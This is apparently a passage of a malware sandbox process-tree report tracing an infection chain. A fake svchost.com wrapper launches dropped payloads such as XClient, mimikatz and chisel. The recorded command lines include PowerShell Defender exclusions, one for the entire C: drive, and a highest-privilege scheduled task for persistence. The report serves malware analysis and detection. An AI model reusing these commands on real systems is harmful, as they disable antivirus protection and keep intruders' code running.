        Suspicious behavior: EnumeratesProcesses
        
        PID:5716
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe"
        6⤵
        Drops file in Windows directory
        
        PID:3216
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:784
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe"
        8⤵
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        9⤵
        
        PID:5296
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe"
        10⤵
        
        PID:4644
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        11⤵
        
        PID:5504
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe"
        12⤵
        
        PID:4204
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        13⤵
        
        PID:7036
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe"
        14⤵
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        15⤵
        
        PID:7480
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe"
        16⤵
        
        PID:8060
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        17⤵
        
        PID:6068
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe"
        18⤵
        
        PID:9196
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        19⤵
        
        PID:7432
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe"
        20⤵
        
        PID:5348
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD4097~1\explorti.exe
        21⤵
        
        PID:8484
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\UPDATE~1.EXE"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:3440
- - C:\Users\Admin\AppData\Local\Temp\a\UPDATE~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\UPDATE~1.EXE
    3⤵
    - Executes dropped EXE
    PID:2072
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\XClient2.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:6036
- - C:\Users\Admin\AppData\Local\Temp\a\XClient2.exe
    C:\Users\Admin\AppData\Local\Temp\a\XClient2.exe
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    PID:5344
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XClient2.exe'
      4⤵
      Drops file in Windows directory
      PID:5728
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XClient2.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5364
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient2.exe'
      4⤵
      PID:4276
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient2.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6072
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\crss.exe'
      4⤵
      Drops file in Windows directory
      PID:6128
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\crss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4876
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'crss.exe'
      4⤵
      Drops file in Windows directory
      PID:6020
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'crss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3236
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "crss" /tr "C:\Users\Admin\AppData\Roaming\crss.exe"
      4⤵
      PID:5652
    - - C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn crss /tr C:\Users\Admin\AppData\Roaming\crss.exe
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5796
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:5488
- - C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
    C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5580
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XClient.exe'
      4⤵
      PID:5164
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4156
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      PID:1552
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5328
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\crss.exe'
      4⤵
      PID:3168
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\crss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5832
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'crss.exe'
      4⤵
      PID:5904
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'crss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1224
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "crss" /tr "C:\Users\Admin\AppData\Roaming\crss.exe"
      4⤵
      PID:5180
    - - C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn crss /tr C:\Users\Admin\AppData\Roaming\crss.exe
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4792
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4276
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\Slovakia.exe"
  2⤵
  - Drops file in Windows directory
  PID:6008
- - C:\Users\Admin\AppData\Local\Temp\a\Slovakia.exe
    C:\Users\Admin\AppData\Local\Temp\a\Slovakia.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5424
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Slovakia.exe'
      4⤵
      PID:756
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Slovakia.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5796
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Slovakia.exe'
      4⤵
      PID:32
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Slovakia.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5388
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2516
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\crss.exe'
      4⤵
      PID:6068
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\crss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6428
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'crss.exe'
      4⤵
      PID:6640
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'crss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6780
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "crss" /tr "C:\Users\Admin\AppData\Roaming\crss.exe"
      4⤵
      PID:6644
    - - C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn crss /tr C:\Users\Admin\AppData\Roaming\crss.exe
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6800
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2888
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\LOADED~1.EXE"
  2⤵
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:5548
- - C:\Users\Admin\AppData\Local\Temp\a\LOADED~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\LOADED~1.EXE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5780
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\LOADED~1.EXE'
      4⤵
      PID:6192
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\LOADED~1.EXE'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6388
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LOADED~1.EXE'
      4⤵
      PID:6648
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LOADED~1.EXE'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6708
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\crss.exe'
      4⤵
      PID:6916
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\crss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6976
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'crss.exe'
      4⤵
      PID:6420
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'crss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6504
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "crss" /tr "C:\Users\Admin\AppData\Roaming\crss.exe"
      4⤵
      PID:6876
    - - C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn crss /tr C:\Users\Admin\AppData\Roaming\crss.exe
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6372
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\XCLIEN~1.EXE"
  2⤵
  - Drops file in Windows directory
  PID:3632
- - C:\Users\Admin\AppData\Local\Temp\a\XCLIEN~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\XCLIEN~1.EXE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5272
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XCLIEN~1.EXE'
      4⤵
      PID:6296
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XCLIEN~1.EXE'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6352
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XCLIEN~1.EXE'
      4⤵
      PID:7164
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XCLIEN~1.EXE'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6216
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\crss.exe'
      4⤵
      PID:7060
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\crss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6336
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'crss.exe'
      4⤵
      PID:5140
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'crss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7240
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "crss" /tr "C:\Users\Admin\AppData\Roaming\crss.exe"
      4⤵
      PID:8152
    - - C:\Windows\SysWOW64\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn crss /tr C:\Users\Admin\AppData\Roaming\crss.exe
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3536
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\qNVQKFyM.exe"
  2⤵
  PID:232
- - C:\Users\Admin\AppData\Local\Temp\a\qNVQKFyM.exe
    C:\Users\Admin\AppData\Local\Temp\a\qNVQKFyM.exe
    3⤵
    PID:5688
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\APEP_7~1.EXE"
  2⤵
  PID:5872
- - C:\Users\Admin\AppData\Local\Temp\a\APEP_7~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\APEP_7~1.EXE
    3⤵
    PID:636
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\dmshell.exe"
  2⤵
  PID:8
- - C:\Users\Admin\AppData\Local\Temp\a\dmshell.exe
    C:\Users\Admin\AppData\Local\Temp\a\dmshell.exe
    3⤵
    PID:992
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd
      4⤵
      PID:6312
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\sapsan.exe"
  2⤵
  PID:3356
- - C:\Users\Admin\AppData\Local\Temp\a\sapsan.exe
    C:\Users\Admin\AppData\Local\Temp\a\sapsan.exe
    3⤵
    PID:5948
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\LEADIA~1.EXE"
  2⤵
  PID:3596
- - C:\Users\Admin\AppData\Local\Temp\a\LEADIA~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\LEADIA~1.EXE
    3⤵
    PID:6220
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\pclient.exe"
  2⤵
  PID:6488
- - C:\Users\Admin\AppData\Local\Temp\a\pclient.exe
    C:\Users\Admin\AppData\Local\Temp\a\pclient.exe
    3⤵
    PID:6616
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\chisel.exe"
  2⤵
  PID:5504
- - C:\Users\Admin\AppData\Local\Temp\a\chisel.exe
    C:\Users\Admin\AppData\Local\Temp\a\chisel.exe
    3⤵
    PID:2172
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\mimikatz.exe"
  2⤵
  PID:7940
- - C:\Users\Admin\AppData\Local\Temp\a\mimikatz.exe
    C:\Users\Admin\AppData\Local\Temp\a\mimikatz.exe
    3⤵
    PID:8076
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\spain.exe"
  2⤵
  PID:7120
- - C:\Users\Admin\AppData\Local\Temp\a\spain.exe
    C:\Users\Admin\AppData\Local\Temp\a\spain.exe
    3⤵
    PID:5856
  - - C:\Users\Admin\AppData\Local\Temp\a\spain.exe
      C:\Users\Admin\AppData\Local\Temp\a\spain.exe
      4⤵
      PID:1076
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:'""
        5⤵
        
        PID:7796
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath 'C:'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8216
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\CHROME~1.EXE"
  2⤵
  PID:1576
- - C:\Users\Admin\AppData\Local\Temp\a\CHROME~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\CHROME~1.EXE
    3⤵
    PID:7356
  - - C:\Users\Admin\AppData\Local\Temp\a\CHROME~1.EXE
      "C:\Users\Admin\AppData\Local\Temp\a\CHROME~1.EXE"
      4⤵
      PID:8452
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\ALEX55~1.EXE"
  2⤵
  PID:6864
- - C:\Users\Admin\AppData\Local\Temp\a\ALEX55~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\ALEX55~1.EXE
    3⤵
    PID:4716
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3896
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\EXPLOR~1.EXE"
        5⤵
        
        PID:8140
      - C:\Users\Admin\AppData\Roaming\CONFIG~1\EXPLOR~1.EXE
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\EXPLOR~1.EXE
        6⤵
        
        PID:7140
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\svhosts.exe"
        5⤵
        
        PID:6248
      - C:\Users\Admin\AppData\Roaming\CONFIG~1\svhosts.exe
        
        C:\Users\Admin\AppData\Roaming\CONFIG~1\svhosts.exe
        6⤵
        
        PID:3988
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 316
      4⤵
      Program crash
      PID:7572
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\GOOGLE~2.EXE"
  2⤵
  PID:7836
- - C:\Users\Admin\AppData\Local\Temp\a\GOOGLE~2.EXE
    C:\Users\Admin\AppData\Local\Temp\a\GOOGLE~2.EXE
    3⤵
    PID:6252
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\123.exe"
  2⤵
  PID:7264
- - C:\Users\Admin\AppData\Local\Temp\a\123.exe
    C:\Users\Admin\AppData\Local\Temp\a\123.exe
    3⤵
    PID:6640
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
  2⤵
  PID:9100
- - C:\Users\Admin\AppData\Local\Temp\a\random.exe
    C:\Users\Admin\AppData\Local\Temp\a\random.exe
    3⤵
    PID:6492
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\FBKECFIIEH.exe"
      4⤵
      PID:3536
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\FBKECFIIEH.exe
        5⤵
        
        PID:7208
      - C:\Users\Admin\AppData\Local\Temp\FBKECFIIEH.exe
        
        C:\Users\Admin\AppData\Local\Temp\FBKECFIIEH.exe
        6⤵
        
        PID:8992
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GHJDHDAECB.exe"
      4⤵
      PID:5508
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\GHJDHDAECB.exe
        5⤵
        
        PID:6592
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\GHJDHD~1.EXE"
        6⤵
        
        PID:4800
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\INTALL~1.EXE"
  2⤵
  PID:8240
- - C:\Users\Admin\AppData\Local\Temp\a\INTALL~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\INTALL~1.EXE
    3⤵
    PID:8700
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\TPWWMU~1.EXE"
  2⤵
  PID:9080
- - C:\Users\Admin\AppData\Local\Temp\a\TPWWMU~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\TPWWMU~1.EXE
    3⤵
    PID:6104
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
      4⤵
      PID:8004
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8004 -s 972
        5⤵
        Program crash
        
        PID:8988
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\setup.exe"
  2⤵
  PID:8968
- - C:\Users\Admin\AppData\Local\Temp\a\setup.exe
    C:\Users\Admin\AppData\Local\Temp\a\setup.exe
    3⤵
    PID:9056
  - - C:\Users\Admin\AppData\Local\Temp\a\setup.exe
      C:\Users\Admin\AppData\Local\Temp\a\setup.exe
      4⤵
      PID:8328
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1rco74e5.cmdline"
        5⤵
        
        PID:7212
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 1152
        5⤵
        
        PID:7604
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\O3B6WY~1.EXE"
  2⤵
  PID:6968
- - C:\Users\Admin\AppData\Local\Temp\a\O3B6WY~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\O3B6WY~1.EXE
    3⤵
    PID:3912
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      4⤵
